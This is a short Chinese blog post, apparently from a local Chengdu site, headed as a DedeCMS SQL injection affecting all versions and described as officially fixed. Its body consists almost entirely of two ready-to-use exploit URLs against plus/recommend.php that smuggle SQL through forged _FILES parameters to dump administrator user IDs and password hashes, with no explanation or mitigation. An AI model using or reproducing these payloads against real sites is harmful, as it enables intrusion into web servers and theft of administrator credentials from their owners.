关注成都生活
我们一直在努力

DedeCMS全版本通杀SQL注入(官方已修复)

Exp:
plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\’ or mid=@`\’` 1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`#@__admin` limit+0,1),5,6,7,8,9#@`\’`+&_FILES[type][name]=1.jpg&_FILES[type] [type]=application/octet-stream&_FILES[type][size]=111
 
 
 
另外一枚/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\’and+char(@`’`)+++1,2,3,group_concat(userid,0x23,pwd),5,6,7,8,9 from `#@__admin`#
赞(0) 打赏
未经允许不得转载:http://xinduseo.com » DedeCMS全版本通杀SQL注入(官方已修复)
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏